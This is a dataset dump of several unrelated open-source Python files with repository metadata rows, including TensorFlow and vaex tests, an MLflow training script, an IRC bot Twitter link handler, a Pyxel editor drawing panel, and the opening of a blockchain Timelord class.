"InceptionV3/Conv2d_2b_3x3": 18624,
"InceptionV3/Conv2d_3b_1x1": 5360,
"InceptionV3/Conv2d_4a_3x3": 138816,
"InceptionV3/Mixed_5b": 256368,
"InceptionV3/Mixed_5c": 277968,
"InceptionV3/Mixed_5d": 285648,
"InceptionV3/Mixed_6a": 1153920,
"InceptionV3/Mixed_6b": 1298944,
"InceptionV3/Mixed_6c": 1692736,
"InceptionV3/Mixed_6d": 1692736,
"InceptionV3/Mixed_6e": 2143872,
"InceptionV3/Mixed_7a": 1699584,
"InceptionV3/Mixed_7b": 5047872,
"InceptionV3/Mixed_7c": 6080064,
}
self.assertDictEqual(expected_param_counts, param_counts)
def _assertCollectionSize(self, expected_size, collection):
actual_size = len(tf.get_collection(collection))
if expected_size != actual_size:
self.fail("Found %d items in collection %s (expected %d)." %
(actual_size, collection, expected_size))
def testTrainableTrueIsTrainingTrue(self):
embeddings = image_embedding.inception_v3(
self._images, trainable=True, is_training=True)
self.assertEqual([self._batch_size, 2048], embeddings.get_shape().as_list())
self._verifyParameterCounts()
self._assertCollectionSize(376, tf.GraphKeys.GLOBAL_VARIABLES)
self._assertCollectionSize(188, tf.GraphKeys.TRAINABLE_VARIABLES)
self._assertCollectionSize(188, tf.GraphKeys.UPDATE_OPS)
self._assertCollectionSize(94, tf.GraphKeys.REGULARIZATION_LOSSES)
self._assertCollectionSize(0, tf.GraphKeys.LOSSES)
self._assertCollectionSize(23, tf.GraphKeys.SUMMARIES)
def testTrainableTrueIsTrainingFalse(self):
embeddings = image_embedding.inception_v3(
self._images, trainable=True, is_training=False)
self.assertEqual([self._batch_size, 2048], embeddings.get_shape().as_list())
self._verifyParameterCounts()
self._assertCollectionSize(376, tf.GraphKeys.GLOBAL_VARIABLES)
self._assertCollectionSize(188, tf.GraphKeys.TRAINABLE_VARIABLES)
self._assertCollectionSize(0, tf.GraphKeys.UPDATE_OPS)
self._assertCollectionSize(94, tf.GraphKeys.REGULARIZATION_LOSSES)
self._assertCollectionSize(0, tf.GraphKeys.LOSSES)
self._assertCollectionSize(23, tf.GraphKeys.SUMMARIES)
def testTrainableFalseIsTrainingTrue(self):
embeddings = image_embedding.inception_v3(
self._images, trainable=False, is_training=True)
self.assertEqual([self._batch_size, 2048], embeddings.get_shape().as_list())
self._verifyParameterCounts()
self._assertCollectionSize(376, tf.GraphKeys.GLOBAL_VARIABLES)
self._assertCollectionSize(0, tf.GraphKeys.TRAINABLE_VARIABLES)
self._assertCollectionSize(0, tf.GraphKeys.UPDATE_OPS)
self._assertCollectionSize(0, tf.GraphKeys.REGULARIZATION_LOSSES)
self._assertCollectionSize(0, tf.GraphKeys.LOSSES)
self._assertCollectionSize(23, tf.GraphKeys.SUMMARIES)
def testTrainableFalseIsTrainingFalse(self):
embeddings = image_embedding.inception_v3(
self._images, trainable=False, is_training=False)
self.assertEqual([self._batch_size, 2048], embeddings.get_shape().as_list())
self._verifyParameterCounts()
self._assertCollectionSize(376, tf.GraphKeys.GLOBAL_VARIABLES)
self._assertCollectionSize(0, tf.GraphKeys.TRAINABLE_VARIABLES)
self._assertCollectionSize(0, tf.GraphKeys.UPDATE_OPS)
self._assertCollectionSize(0, tf.GraphKeys.REGULARIZATION_LOSSES)
self._assertCollectionSize(0, tf.GraphKeys.LOSSES)
self._assertCollectionSize(23, tf.GraphKeys.SUMMARIES)
if __name__ == "__main__":
tf.test.main()
| 43.551471 | 84 | 0.682087 |
acdfbeb9b136bb32011ef95e951f79ef06624377 | 5,199 | py | Python | ocddetection/learning/centralized/evaluation/__init__.py | Lando-L/ocd-detection | 7b74e0c74070ec18df67d31631d2da8b76190846 | [
"MIT"
] | 1 | 2021-06-21T13:16:12.000Z | 2021-06-21T13:16:12.000Z | ocddetection/learning/centralized/evaluation/__init__.py | Lando-L/ocd-detection | 7b74e0c74070ec18df67d31631d2da8b76190846 | [
"MIT"
] | null | null | null | ocddetection/learning/centralized/evaluation/__init__.py | Lando-L/ocd-detection | 7b74e0c74070ec18df67d31631d2da8b76190846 | [
"MIT"
] | null | null | null | from collections import namedtuple
from functools import partial, reduce
import os
from typing import Iterable, List, Tuple
import matplotlib.pylab as plt
import mlflow
import numpy as np
import pandas as pd
import seaborn as sns
import tensorflow as tf
from ocddetection import losses, metrics, models
from ocddetection.data import preprocessing, SENSORS
Config = namedtuple(
'Config',
['path', 'learning_rate', 'epochs', 'batch_size', 'window_size', 'pos_weight', 'hidden_size', 'dropout']
)
def __load_data(path, window_size, batch_size) -> Iterable[Tuple[tf.data.Dataset, tf.data.Dataset, tf.data.Dataset]]:
for i in range(1, 5):
files = pd.Series(
[os.path.join(path, f'S{subject}-ADL{run}-AUGMENTED.csv') for subject in range(1, 5) for run in range(1, 6)],
index=pd.MultiIndex.from_product([list(range(1, 5)), list(range(1, 6))]),
name='path'
)
train_files, val_files, test_files = preprocessing.split(
files,
validation=[(subject, i) for subject in range(1, 5)],
test=[(subject, 5) for subject in range(1, 5)]
)
train = preprocessing.to_centralised(train_files, window_size, batch_size)
val = preprocessing.to_centralised(val_files, window_size, batch_size)
test = preprocessing.to_centralised(test_files, window_size, batch_size)
yield train, val, test
def __model_fn(window_size: int, hidden_size: int, dropout: float) -> tf.keras.Model:
return models.bidirectional(window_size, len(SENSORS), hidden_size, dropout)
def __metrics_fn() -> List[tf.keras.metrics.Metric]:
thresholds = list(np.linspace(0, 1, 200, endpoint=False))
return [
metrics.AUC(from_logits=True, curve='PR', name='auc'),
metrics.Precision(from_logits=True, thresholds=thresholds, name='precision'),
metrics.Recall(from_logits=True, thresholds=thresholds, name='recall')
]
def __optimizer_fn(learning_rate: float) -> tf.keras.optimizers.Optimizer:
return tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=0.9)
def __train_step(
X: tf.Tensor,
y: tf.Tensor,
model: tf.keras.Model,
optimizer: tf.keras.optimizers.Optimizer,
loss_fn: tf.keras.losses.Loss
) -> None:
with tf.GradientTape() as tape:
logits = model(X, training=True)
loss_value = loss_fn(y, logits)
optimizer.apply_gradients(
zip(
tape.gradient(loss_value, model.trainable_variables),
model.trainable_variables
)
)
def __validation_step(
state: tf.Tensor,
batch: Tuple[tf.Tensor, tf.Tensor],
model: tf.keras.Model,
metrics: List[tf.keras.metrics.Metric]
) -> tf.Tensor:
logits = model(batch[0], training=False)
y_true = tf.reshape(batch[1], (-1,))
y_pred = tf.round(tf.nn.sigmoid(tf.reshape(logits, (-1,))))
for metric in metrics:
metric.update_state(batch[1], logits)
return state + tf.math.confusion_matrix(y_true, y_pred, num_classes=2)
def run(experiment_name: str, run_name: str, config: Config) -> None:
mlflow.set_experiment(experiment_name)
with mlflow.start_run(run_name=run_name):
mlflow.log_params(config._asdict())
def reduce_fn(state, data):
model = __model_fn(config.window_size, config.hidden_size, config.dropout)
loss_fn = losses.WeightedBinaryCrossEntropy(config.pos_weight)
optimizer = __optimizer_fn(config.learning_rate)
input_spec = (
tf.TensorSpec((None, config.window_size, len(SENSORS)), dtype=tf.float32),
tf.TensorSpec((None, 1), dtype=tf.float32)
)
train_step = tf.function(
partial(__train_step, model=model, optimizer=optimizer, loss_fn=loss_fn),
input_signature=input_spec
)
val_state = tf.zeros((2, 2), dtype=tf.int32)
val_metrics = __metrics_fn()
val_step = partial(__validation_step, model=model, metrics=val_metrics)
for _ in range(1, config.epochs + 1):
for X, y in data[0]:
train_step(X, y)
confusion_matrix = data[1].reduce(val_state, val_step)
auc = val_metrics[0].result().numpy()
precision = val_metrics[1].result().numpy()
recall = val_metrics[2].result().numpy()
return (
state[0] + confusion_matrix,
state[1] + [auc],
state[2] + [precision],
state[3] + [recall]
)
confusion_matrix, auc, precision, recall = reduce(
reduce_fn,
__load_data(config.path, config.window_size, config.batch_size),
(
tf.zeros((2, 2), dtype=tf.int32),
[],
[],
[]
)
)
# Confusion matrix
fig, ax = plt.subplots(figsize=(16, 8))
sns.heatmap(confusion_matrix, annot=True, fmt='d', cmap=sns.color_palette("Blues"), ax=ax)
ax.set_xlabel('Predicted')
ax.set_ylabel('Ground Truth')
mlflow.log_figure(fig, 'confusion_matrix.png')
plt.close(fig)
# AUC
mlflow.log_metric('val_auc', np.mean(auc))
# Precision Recall
fig, ax = plt.subplots(figsize=(16, 8))
sns.lineplot(x=np.mean(recall, axis=0), y=np.mean(precision, axis=0), ax=ax)
ax.set_xlabel('Recall')
ax.set_xlim(0., 1.)
ax.set_ylabel('Precision')
ax.set_ylim(0., 1.)
mlflow.log_figure(fig, 'precision_recall.png')
plt.close(fig)
| 29.539773 | 117 | 0.677053 |
acdfbf883c0fb76c51183f938137876276c5994f | 2,354 | py | Python | michiru/modules/uribot/twitter.py | moeIO/michiru | f1bafb90c2d82debee9e0402b426eba592038f24 | [
"WTFPL"
] | 1 | 2018-01-25T15:39:12.000Z | 2018-01-25T15:39:12.000Z | michiru/modules/uribot/twitter.py | moeIO/michiru | f1bafb90c2d82debee9e0402b426eba592038f24 | [
"WTFPL"
] | null | null | null | michiru/modules/uribot/twitter.py | moeIO/michiru | f1bafb90c2d82debee9e0402b426eba592038f24 | [
"WTFPL"
] | null | null | null | # URI title bot - Twitter module.
import re
import bs4
from michiru import config, modules
## Module information.
__name__ = 'uribot.twitter'
__author__ = 'Shiz'
__license__ = 'WTFPL'
__desc__ = 'Gives URL information for Twitter links.'
__deps__ = ['uribot']
URI_REGEXP = re.compile(r'^https?://(?:www\.){0,1}twitter\.com/([a-zA-Z0-9_-]+)/status/([0-9]+)(?:[?#&]\S*)?$')
## Module.
def uri_twitter(bot, response, matches):
""" Extract Twitter status information. """
html = bs4.BeautifulSoup(response.text)
# Extract tweet and strip HTML.
tweet = ''.join(html.find('div', class_='permalink-tweet-container').find('p', class_='tweet-text').find_all(text=True))
# Extract user.
user = html.find('div', class_='permalink-tweet-container').find('div', class_='tweet')['data-name']
# Try to extract metadata.
try:
retweets = html.find('ul', class_='stats').find('li', class_='js-stat-retweets').strong.string
except:
retweets = None
try:
likes = html.find('ul', class_='stats').find('li', class_='js-stat-favorites').strong.string
except:
likes = None
# Extract images.
images = html.find_all('meta', property='og:image')
for image in images:
url = image['content']
if url.count(':') > 1:
url = url.rsplit(':', maxsplit=1)[0]
if 'profile_images' in url:
continue
if re.search(r'(?:https?://)?pic\.twitter\.com/[a-zA-Z0-9_-]+', tweet):
tweet = re.sub(r'(?:https?://)?pic\.twitter\.com/[a-zA-Z0-9_-]+', url, tweet)
elif re.search(r'(?:https?://)t\.co/[a-zA-Z0-9_-]+', tweet):
tweet = re.sub(r'(?:https?://)t\.co/[a-zA-Z0-9_-]+', url, tweet)
else:
tweet += ' ' + url
# Un-cramp URLs.
tweet = re.sub(r'(?!\s+)http(s?):', r' http\1:', tweet)
# Post-process tweet a bit.
tweet = re.sub(r'\s+', ' ', tweet).strip()
# Build metadata.
meta = []
if retweets:
meta.append('↻ ' + retweets)
if likes:
meta.append('♥ ' + likes)
return 'Twitter: {}'.format(user), tweet, ', '.join(meta)
def load():
from michiru.modules import uribot
uribot.URI_HANDLERS[URI_REGEXP] = {
'handler': uri_twitter,
}
def unload():
from michiru.modules import uribot
del uribot.URI_HANDLERS[URI_REGEXP]
| 30.179487 | 124 | 0.584962 |
acdfc0710328cda7bc1a76726f8d0450b062c066 | 210 | py | Python | data/external/repositories/139781/ndsb-master/caffe-dev/python/caffe/__init__.py | Keesiu/meta-kaggle | 87de739aba2399fd31072ee81b391f9b7a63f540 | [
"MIT"
] | null | null | null | data/external/repositories/139781/ndsb-master/caffe-dev/python/caffe/__init__.py | Keesiu/meta-kaggle | 87de739aba2399fd31072ee81b391f9b7a63f540 | [
"MIT"
] | null | null | null | data/external/repositories/139781/ndsb-master/caffe-dev/python/caffe/__init__.py | Keesiu/meta-kaggle | 87de739aba2399fd31072ee81b391f9b7a63f540 | [
"MIT"
] | 1 | 2019-12-04T08:23:33.000Z | 2019-12-04T08:23:33.000Z | from .pycaffe import Net, SGDSolver
from ._caffe import set_mode_cpu, set_mode_gpu, set_device, \
set_phase_train, set_phase_test
from .classifier import Classifier
from .detector import Detector
import io
| 30 | 61 | 0.819048 |
acdfc0bb1cf2bf0174bf9d3aef5cf9c5e8677eff | 997 | py | Python | tests/astype_test.py | rishi1111/vaex | b3516201d04e9277b8918dadab9df33a7c83c01a | [
"MIT"
] | 1 | 2020-11-27T08:49:18.000Z | 2020-11-27T08:49:18.000Z | tests/astype_test.py | rishi1111/vaex | b3516201d04e9277b8918dadab9df33a7c83c01a | [
"MIT"
] | null | null | null | tests/astype_test.py | rishi1111/vaex | b3516201d04e9277b8918dadab9df33a7c83c01a | [
"MIT"
] | null | null | null | from common import *
import collections
import numpy as np
def test_astype(ds_local):
ds = ds_local
ds_original = ds.copy()
#ds.columns['x'] = (ds.columns['x']*1).copy() # convert non non-big endian for now
ds['x'] = ds['x'].astype('f4')
assert ds.x.evaluate().dtype == np.float32
assert ds.x.tolist() == ds_original.x.as_numpy().evaluate().astype(np.float32).tolist()
def test_astype_str():
df = vaex.from_arrays(x=['10,010', '-50,0', '11,111'])
df['x'] = df['x'].str.replace(',', '').evaluate()
df['x'] = (df['x'].astype('float')).astype('int64').evaluate()
assert df.columns['x'].dtype == np.int64
assert df.x.dtype == np.int64
def test_astype_dtype():
df = vaex.from_arrays(x=[0, 1])
assert df.x.astype(str).data_type() in [pa.string(), pa.large_string()]
df = vaex.from_arrays(x=[np.nan, 1])
# assert df.x.astype(str).dtype == vaex.column.str_type
assert df.x.astype(str).data_type() in [pa.string(), pa.large_string()]
| 33.233333 | 91 | 0.625878 |
acdfc16cc7fdb2a278df751614c80755caa00938 | 1,144 | py | Python | intro_types.py | ericauuu/data_types | 6efd000e3239b7b3a17d5c90ee5e67f4740c3f82 | [
"MIT"
] | null | null | null | intro_types.py | ericauuu/data_types | 6efd000e3239b7b3a17d5c90ee5e67f4740c3f82 | [
"MIT"
] | null | null | null | intro_types.py | ericauuu/data_types | 6efd000e3239b7b3a17d5c90ee5e67f4740c3f82 | [
"MIT"
] | null | null | null | """
Let's learn about Python types!
"""
import json #library
with open("raw_data/data.json", "r") as json_file:
text = json_file.read()
data = json.loads(text)
main_keys = data.keys()
print(f"he main keys are: {main_keys}")
language_code = data['LanguageCode']
print(language_code)
searh_parameters = data['SearchParameters']
print(searh_parameters)
search_result = data['SearchResult']
#print(search_result)
search_result_keys = search_result.keys()
print(f"The search_result keys are: {search_result_keys}")
search_result_count = search_result['SearchResultCount']
print(search_result_count)
search_result_count_all = search_result['SearchResultCountAll']
print(search_result_count_all)
search_result_items = search_result['SearchResultItems']
print(search_result_items)
test_item = search_result_items[0]
print(f"""test_item contains {test_item} and is of type {type(test_item)}""")
print(len(search_result_items))
list_of_types = [type(item)
for item in search_result_items]
print(list_of_types)
unique_types = set(list_of_types)
print(f"The unique types in list_of_types is: {unique_types}")
| 23.346939 | 77 | 0.765734 |
acdfc1f7aafcae564f6e0182c1a6dd51cdeb339f | 402 | py | Python | molecule/default/tests/test_ius_repo.py | rmachuca89/ansible-ius-repo | 45cdd37b076119f2895cd6b8fc27f62e619c17f1 | [
"Apache-2.0"
] | null | null | null | molecule/default/tests/test_ius_repo.py | rmachuca89/ansible-ius-repo | 45cdd37b076119f2895cd6b8fc27f62e619c17f1 | [
"Apache-2.0"
] | null | null | null | molecule/default/tests/test_ius_repo.py | rmachuca89/ansible-ius-repo | 45cdd37b076119f2895cd6b8fc27f62e619c17f1 | [
"Apache-2.0"
] | null | null | null | """IUS repo testinfra tests."""
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_ius_repo_installed(host):
"""Test package is installed."""
ius_repo = host.package('ius-release')
assert ius_repo.is_installed
# assert ius_repo.version.startswith("")
| 25.125 | 63 | 0.748756 |
acdfc390ae55177c514383c90a96a5acb5723636 | 13,457 | py | Python | pyxel/editor/drawing_panel.py | JUNE-9653/pyxel | 2d0c828757ea0183cfca526f78d0d72ae4b76753 | [
"MIT"
] | 1 | 2019-07-13T01:46:45.000Z | 2019-07-13T01:46:45.000Z | pyxel/editor/drawing_panel.py | JUNE-9653/pyxel | 2d0c828757ea0183cfca526f78d0d72ae4b76753 | [
"MIT"
] | null | null | null | pyxel/editor/drawing_panel.py | JUNE-9653/pyxel | 2d0c828757ea0183cfca526f78d0d72ae4b76753 | [
"MIT"
] | null | null | null | import pyxel
from pyxel.ui import ScrollBar, Widget
from pyxel.ui.constants import WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME
from .constants import (
TOOL_BUCKET,
TOOL_CIRC,
TOOL_CIRCB,
TOOL_PENCIL,
TOOL_RECT,
TOOL_RECTB,
TOOL_SELECT,
)
from .overlay_canvas import OverlayCanvas
class DrawingPanel(Widget):
def __init__(self, parent, *, is_tilemap_mode):
super().__init__(parent, 11, 16, 130, 130)
self._is_tilemap_mode = is_tilemap_mode
self._history_data = None
self.viewport_x = 0
self.viewport_y = 0
self._press_x = 0
self._press_y = 0
self._last_x = 0
self._last_y = 0
self._drag_offset_x = 0
self._drag_offset_y = 0
self._select_x1 = 0
self._select_y1 = 0
self._select_x2 = 0
self._select_y2 = 0
self._copy_buffer = None
self._is_dragged = False
self._is_assist_mode = False
self._overlay_canvas = OverlayCanvas()
self._h_scroll_bar = ScrollBar(
self, 11, 145, 130, ScrollBar.HORIZONTAL, 32, 2, 0
)
self._v_scroll_bar = ScrollBar(self, 140, 16, 130, ScrollBar.VERTICAL, 32, 2, 0)
self.add_event_handler("mouse_down", self.__on_mouse_down)
self.add_event_handler("mouse_up", self.__on_mouse_up)
self.add_event_handler("mouse_click", self.__on_mouse_click)
self.add_event_handler("mouse_drag", self.__on_mouse_drag)
self.add_event_handler("mouse_hover", self.__on_mouse_hover)
self.add_event_handler("update", self.__on_update)
self.add_event_handler("draw", self.__on_draw)
self._h_scroll_bar.add_event_handler("change", self.__on_h_scroll_bar_change)
self._v_scroll_bar.add_event_handler("change", self.__on_v_scroll_bar_change)
def _add_pre_history(self, canvas):
self._history_data = data = {}
if self._is_tilemap_mode:
data["tilemap"] = self.parent.tilemap
else:
data["image"] = self.parent.image
data["pos"] = (self.viewport_x, self.viewport_y)
data["before"] = canvas.copy()
def _add_post_history(self, canvas):
data = self._history_data
data["after"] = canvas.copy()
if (data["before"] != data["after"]).any():
self.parent.add_history(data)
def _screen_to_view(self, x, y):
x = min(max((x - self.x - 1) // 8, 0), 15)
y = min(max((y - self.y - 1) // 8, 0), 15)
return x, y
def __on_mouse_down(self, key, x, y):
if key != pyxel.MOUSE_LEFT_BUTTON:
return
x, y = self._screen_to_view(x, y)
self._press_x = x
self._press_y = y
self._is_dragged = True
self._is_assist_mode = False
if self.parent.tool == TOOL_SELECT:
self._select_x1 = self._select_x2 = x
self._select_y1 = self._select_y2 = y
elif TOOL_PENCIL <= self.parent.tool <= TOOL_CIRC:
self._overlay_canvas.pix(x, y, self.parent.color)
elif self.parent.tool == TOOL_BUCKET:
data = (
pyxel.tilemap(self.parent.tilemap).data
if self._is_tilemap_mode
else pyxel.image(self.parent.image).data
)
dest = data[
self.viewport_y : self.viewport_y + 16,
self.viewport_x : self.viewport_x + 16,
]
self._add_pre_history(dest)
self._overlay_canvas.fill(x, y, self.parent.color, dest)
self._add_post_history(dest)
self._last_x = x
self._last_y = y
def __on_mouse_up(self, key, x, y):
if key != pyxel.MOUSE_LEFT_BUTTON:
return
self._is_dragged = False
if TOOL_PENCIL <= self.parent.tool <= TOOL_CIRC:
data = (
pyxel.tilemap(self.parent.tilemap).data
if self._is_tilemap_mode
else pyxel.image(self.parent.image).data
)
dest = data[
self.viewport_y : self.viewport_y + 16,
self.viewport_x : self.viewport_x + 16,
]
self._add_pre_history(dest)
index = self._overlay_canvas.data != OverlayCanvas.COLOR_NONE
dest[index] = self._overlay_canvas.data[index]
self._overlay_canvas.clear()
self._add_post_history(dest)
def __on_mouse_click(self, key, x, y):
if key == pyxel.MOUSE_RIGHT_BUTTON:
x = self.viewport_x + (x - self.x) // 8
y = self.viewport_y + (y - self.y) // 8
if self._is_tilemap_mode:
self.parent.color = pyxel.tilemap(self.parent.tilemap).data[y, x]
else:
self.parent.color = pyxel.image(self.parent.image).data[y, x]
def __on_mouse_drag(self, key, x, y, dx, dy):
if key == pyxel.MOUSE_LEFT_BUTTON:
x1 = self._press_x
y1 = self._press_y
x2 = (x - self.x - 1) // 8
y2 = (y - self.y - 1) // 8
if self.parent.tool == TOOL_SELECT:
x2 = min(max(x2, 0), 15)
y2 = min(max(y2, 0), 15)
self._select_x1, self._select_x2 = (x1, x2) if x1 < x2 else (x2, x1)
self._select_y1, self._select_y2 = (y1, y2) if y1 < y2 else (y2, y1)
elif self.parent.tool == TOOL_PENCIL:
if self._is_assist_mode:
self._overlay_canvas.clear()
self._overlay_canvas.line(x1, y1, x2, y2, self.parent.color)
else:
self._overlay_canvas.line(
self._last_x, self._last_y, x2, y2, self.parent.color
)
elif self.parent.tool == TOOL_RECTB:
self._overlay_canvas.clear()
self._overlay_canvas.rectb(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
elif self.parent.tool == TOOL_RECT:
self._overlay_canvas.clear()
self._overlay_canvas.rect(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
elif self.parent.tool == TOOL_CIRCB:
self._overlay_canvas.clear()
self._overlay_canvas.circb(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
elif self.parent.tool == TOOL_CIRC:
self._overlay_canvas.clear()
self._overlay_canvas.circ(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
self._last_x = x2
self._last_y = y2
elif key == pyxel.MOUSE_RIGHT_BUTTON:
self._drag_offset_x -= dx
self._drag_offset_y -= dy
if abs(self._drag_offset_x) >= 16:
offset = self._drag_offset_x // 16
self.viewport_x += offset * 8
self._drag_offset_x -= offset * 16
if abs(self._drag_offset_y) >= 16:
offset = self._drag_offset_y // 16
self.viewport_y += offset * 8
self._drag_offset_y -= offset * 16
self.viewport_x = min(max(self.viewport_x, 0), 240)
self.viewport_y = min(max(self.viewport_y, 0), 240)
def __on_mouse_hover(self, x, y):
if self.parent.tool == TOOL_SELECT:
s = "COPY:CTRL+C PASTE:CTRL+V"
elif self._is_dragged:
s = "ASSIST:SHIFT"
else:
s = "PICK:R-CLICK VIEW:R-DRAG"
x, y = self._screen_to_view(x, y)
x += self.viewport_x
y += self.viewport_y
self.parent.help_message = s + " ({},{})".format(x, y)
def __on_update(self):
if self._is_dragged and not self._is_assist_mode and pyxel.btn(pyxel.KEY_SHIFT):
self._is_assist_mode = True
x1 = self._press_x
y1 = self._press_y
x2 = self._last_x
y2 = self._last_y
if self.parent.tool == TOOL_PENCIL:
self._overlay_canvas.clear()
self._overlay_canvas.line(x1, y1, x2, y2, self.parent.color)
elif self.parent.tool == TOOL_RECTB:
self._overlay_canvas.clear()
self._overlay_canvas.rectb(x1, y1, x2, y2, self.parent.color, True)
elif self.parent.tool == TOOL_RECT:
self._overlay_canvas.clear()
self._overlay_canvas.rect(x1, y1, x2, y2, self.parent.color, True)
elif self.parent.tool == TOOL_CIRCB:
self._overlay_canvas.clear()
self._overlay_canvas.circb(x1, y1, x2, y2, self.parent.color, True)
elif self.parent.tool == TOOL_CIRC:
self._overlay_canvas.clear()
self._overlay_canvas.circ(x1, y1, x2, y2, self.parent.color, True)
if (
self.parent.tool == TOOL_SELECT
and self._select_x1 >= 0
and pyxel.btn(pyxel.KEY_CONTROL)
):
if pyxel.btnp(pyxel.KEY_C):
if self._is_tilemap_mode:
data = pyxel.tilemap(self.parent.tilemap).data
else:
data = pyxel.image(self.parent.image).data
src = data[
self.viewport_y
+ self._select_y1 : self.viewport_y
+ self._select_y2
+ 1,
self.viewport_x
+ self._select_x1 : self.viewport_x
+ self._select_x2
+ 1,
]
self._copy_buffer = src.copy()
elif self._copy_buffer is not None and pyxel.btnp(pyxel.KEY_V):
x1 = self.viewport_x + self._select_x1
y1 = self.viewport_y + self._select_y1
height, width = self._copy_buffer.shape
width -= max(self._select_x1 + width - 16, 0)
height -= max(self._select_y1 + height - 16, 0)
if self._is_tilemap_mode:
data = pyxel.tilemap(self.parent.tilemap).data
else:
data = pyxel.image(self.parent.image).data
dest = data[y1 : y1 + height, x1 : x1 + width]
dest[:, :] = self._copy_buffer[:height, :width]
if (
pyxel.btn(pyxel.KEY_SHIFT)
or pyxel.btn(pyxel.KEY_CONTROL)
or pyxel.btn(pyxel.KEY_ALT)
):
return
if pyxel.btnp(pyxel.KEY_LEFT, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_x -= 8
if pyxel.btnp(pyxel.KEY_RIGHT, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_x += 8
if pyxel.btnp(pyxel.KEY_UP, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_y -= 8
if pyxel.btnp(pyxel.KEY_DOWN, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_y += 8
self.viewport_x = min(max(self.viewport_x, 0), 240)
self.viewport_y = min(max(self.viewport_y, 0), 240)
self._h_scroll_bar.value = self.viewport_x // 8
self._v_scroll_bar.value = self.viewport_y // 8
def __on_draw(self):
self.draw_panel(self.x, self.y, self.width, self.height)
if self._is_tilemap_mode:
pyxel.bltm(
self.x + 1,
self.y + 1,
self.parent.tilemap,
self.viewport_x,
self.viewport_y,
16,
16,
)
for i in range(16):
y = self.y + i * 8 + 1
for j in range(16):
x = self.x + j * 8 + 1
val = self._overlay_canvas.data[i, j]
if val != OverlayCanvas.COLOR_NONE:
sx = (val % 32) * 8
sy = (val // 32) * 8
pyxel.blt(x, y, self.parent.image, sx, sy, 8, 8)
else:
for i in range(16):
y = self.y + i * 8 + 1
for j in range(16):
x = self.x + j * 8 + 1
val = self._overlay_canvas.data[i, j]
if val != OverlayCanvas.COLOR_NONE:
col = self._overlay_canvas.data[i, j]
else:
data = pyxel.image(self.parent.image).data
col = data[self.viewport_y + i, self.viewport_x + j]
pyxel.rect(x, y, 8, 8, col)
pyxel.line(self.x + 1, self.y + 64, self.x + 128, self.y + 64, 1)
pyxel.line(self.x + 64, self.y + 1, self.x + 64, self.y + 128, 1)
if self.parent.tool == TOOL_SELECT and self._select_x1 >= 0:
pyxel.clip(self.x + 1, self.y + 1, self.x + 128, self.y + 128)
x = self._select_x1 * 8 + 12
y = self._select_y1 * 8 + 17
w = self._select_x2 * 8 - x + 20
h = self._select_y2 * 8 - y + 25
pyxel.rectb(x, y, w, h, 15)
pyxel.rectb(x + 1, y + 1, w - 2, h - 2, 0)
pyxel.rectb(x - 1, y - 1, w + 2, h + 2, 0)
pyxel.clip()
def __on_h_scroll_bar_change(self, value):
self.viewport_x = value * 8
def __on_v_scroll_bar_change(self, value):
self.viewport_y = value * 8
| 36.174731 | 88 | 0.532957 |
acdfc41a87a3691c3eaea2e619d962213e914c5f | 51,144 | py | Python | apple/timelord/timelord.py | grayfallstown/apple-blockchain | 018041f158ac375f92c67b99f7ff163273407b6c | [
"Apache-2.0"
] | null | null | null | apple/timelord/timelord.py | grayfallstown/apple-blockchain | 018041f158ac375f92c67b99f7ff163273407b6c | [
"Apache-2.0"
] | null | null | null | apple/timelord/timelord.py | grayfallstown/apple-blockchain | 018041f158ac375f92c67b99f7ff163273407b6c | [
"Apache-2.0"
] | null | null | null | import asyncio
import dataclasses
import io
import logging
import random
import time
import traceback
from typing import Callable, Dict, List, Optional, Tuple, Set
from chiavdf import create_discriminant
from apple.consensus.constants import ConsensusConstants
from apple.consensus.pot_iterations import calculate_sp_iters, is_overflow_block
from apple.protocols import timelord_protocol
from apple.protocols.protocol_message_types import ProtocolMessageTypes
from apple.server.outbound_message import NodeType, make_msg
from apple.server.server import AppleServer
from apple.timelord.iters_from_block import iters_from_block
from apple.timelord.timelord_state import LastState
from apple.timelord.types import Chain, IterationType, StateType
from apple.types.blockchain_format.classgroup import ClassgroupElement
from apple.types.blockchain_format.reward_chain_block import RewardChainBlock
from apple.types.blockchain_format.sized_bytes import bytes32
from apple.types.blockchain_format.slots import (
ChallengeChainSubSlot,
InfusedChallengeChainSubSlot,
RewardChainSubSlot,
SubSlotProofs,
)
from apple.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from apple.types.blockchain_format.vdf import VDFInfo, VDFProof
from apple.types.end_of_slot_bundle import EndOfSubSlotBundle
from apple.util.ints import uint8, uint32, uint64, uint128
log = logging.getLogger(__name__)
class Timelord:
def __init__(self, root_path, config: Dict, constants: ConsensusConstants):
self.config = config
self.root_path = root_path
self.constants = constants
self._shut_down = False
self.free_clients: List[Tuple[str, asyncio.StreamReader, asyncio.StreamWriter]] = []
self.potential_free_clients: List = []
self.ip_whitelist = self.config["vdf_clients"]["ip"]
self.server: Optional[AppleServer] = None
self.chain_type_to_stream: Dict[Chain, Tuple[str, asyncio.StreamReader, asyncio.StreamWriter]] = {}
self.chain_start_time: Dict = {}
# Chains that currently don't have a vdf_client.
self.unspawned_chains: List[Chain] = [
Chain.CHALLENGE_CHAIN,
Chain.REWARD_CHAIN,
Chain.INFUSED_CHALLENGE_CHAIN,
]
# Chains that currently accept iterations.
self.allows_iters: List[Chain] = []
# Last peak received, None if it's already processed.
self.new_peak: Optional[timelord_protocol.NewPeakTimelord] = None
# Last end of subslot bundle, None if we built a peak on top of it.
self.new_subslot_end: Optional[EndOfSubSlotBundle] = None
# Last state received. Can either be a new peak or a new EndOfSubslotBundle.
# Unfinished block info, iters adjusted to the last peak.
self.unfinished_blocks: List[timelord_protocol.NewUnfinishedBlockTimelord] = []
# Signage points iters, adjusted to the last peak.
self.signage_point_iters: List[Tuple[uint64, uint8]] = []
